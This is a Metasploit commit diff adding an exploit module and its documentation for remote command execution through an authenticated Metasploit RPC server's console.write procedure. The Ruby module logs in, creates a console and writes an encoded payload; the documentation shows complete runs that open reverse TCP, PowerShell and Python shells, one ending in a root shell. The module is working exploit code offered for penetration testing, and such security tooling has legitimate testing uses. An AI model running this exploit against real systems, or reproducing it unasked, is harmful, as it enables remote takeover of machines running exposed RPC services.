Land rapid7#8652, rpc console write exploit

lands pr for the metasploit rpc console write exploit

Author: David Maloney

documentation/modules/exploit/multi/misc/msf_rpc_console.md

@@ -0,0 +1,142 @@
+## Description
+
+  This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
+
+
+## Vulnerable Application
+
+  [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
+
+  To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
+
+  This module has been tested successfully on:
+
+  * Metasploit 4.15 on Kali 1.0.6
+  * Metasploit 4.14 on Kali 2017.1
+  * Metasploit 4.14 on Windows 7 SP1
+
+  Source and Installers:
+
+  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
+  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/multi/misc/msf_rpc_console`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set RPORT [PORT]` (default: `55552`)
+  5. Do: `set USERNAME [USERNAME]` (default: `msf`)
+  6. Do: `set PASSWORD [PASSWORD]`
+  7. Do: `set LHOST [IP]`
+  8. Do: `run`
+  9. You should get a session
+
+
+## Options
+
+  **Username**
+
+  The username for Metasploit RPC (default: `msf`).
+
+  **Password**
+
+  The password for the RPC user.
+
+
+## Scenarios
+
+### Ruby Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 0
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #0
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
+
+  whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Windows CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 1
+  msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp 
+  payload => cmd/windows/powershell_reverse_tcp
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse SSL handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #1
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
+
+  Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
+  Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+  PS C:\metasploit>whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Unix CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.215
+  rhost => 172.16.191.215
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 2
+  target => 2
+  msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
+  payload => cmd/unix/reverse_python
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.215:55552 - Authenticated successfully
+  [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
+  [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
+  [*] 172.16.191.215:55552 - API version 1.0
+  [+] 172.16.191.215:55552 - Created console #0
+  [*] 172.16.191.215:55552 - Sending payload...
+  [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
+
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ```
+

modules/exploits/multi/misc/msf_rpc_console.rb

@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/rpc/v10/client'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Metasploit RPC Console Command Execution',
+      'Description'     => %q{
+        This module connects to a specified Metasploit RPC server and
+        uses the 'console.write' procedure to execute operating
+        system commands. Valid credentials are required to access the
+        RPC interface.
+
+        This module has been tested successfully on Metasploit 4.15
+        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
+        4.14 on Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'     =>
+        [
+          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
+          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
+        ],
+      'Platform'       => %w{ ruby unix win },
+      'Targets'        => [
+          [ 'Ruby',        { 'Arch'     => ARCH_RUBY,
+                             'Platform' => 'ruby',
+                             'Payload'  => { 'BadChars' => "\x00" } } ],
+          [ 'Windows CMD', { 'Arch'     => ARCH_CMD,
+                             'Platform' => 'win',
+                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],
+          [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,
+                             'Platform' => 'unix',
+                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]
+        ],
+      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 22 2011',
+      'DefaultTarget'  => 0))
+    register_options [ Opt::RPORT(55552),
+                       OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
+                       OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
+                       OptBool.new('SSL', [ true, 'Use SSL', true]) ]
+  end
+
+  def execute_command(cmd, opts = {})
+    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    unless res['wrote'].to_s =~ /\A\d+\z/
+      print_error "Could not write to console #{@console_id}:"
+      print_line res.to_s
+      return
+    end
+
+    vprint_good "Wrote #{res['wrote']} bytes to console"
+  end
+
+  def exploit
+    begin
+      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
+    rescue Rex::ConnectionRefused => e
+      fail_with Failure::Unreachable, 'Connection refused'
+    rescue => e
+      fail_with Failure::Unknown, "Connection failed: #{e}"
+    end
+
+    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
+
+    if @rpc.token.nil?
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+    vprint_status "Received temporary token: #{@rpc.token}"
+
+    version = @rpc.call 'core.version'
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    print_status "Metasploit #{version['version']}"
+    print_status "Ruby #{version['ruby']}"
+    print_status "API version #{version['api']}"
+
+    vprint_status 'Creating new console...'
+    res = @rpc.call 'console.create'
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    unless res['id'].to_s =~ /\A\d+\z/
+      print_error 'Could not create console:'
+      print_line res.to_s
+      return
+    end
+
+    @console_id = res['id']
+    print_good "Created console ##{@console_id}"
+
+    print_status 'Sending payload...'
+
+    case target['Platform']
+    when 'ruby'
+      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
+    when 'win'
+      cmd = payload.encoded
+    when 'unix'
+      cmd = payload.encoded
+    else
+      fail_with Failure::NoTarget, 'Invalid target'
+    end
+
+    execute_command cmd
+  end
+
+  def cleanup
+    return if @console_id.nil?
+
+    vprint_status 'Removing console...'
+    res = @rpc.call 'console.destroy', @console_id
+
+    if res.nil?
+      print_error 'Connection failed'
+      return
+    end
+
+    unless res['result'].eql? 'success'
+      print_warning "Could not destroy console ##{@console_id}:"
+      print_line res.to_s
+      return
+    end
+
+    vprint_good "Destroyed console ##{@console_id}"
+  ensure
+    @rpc.close
+  end
+end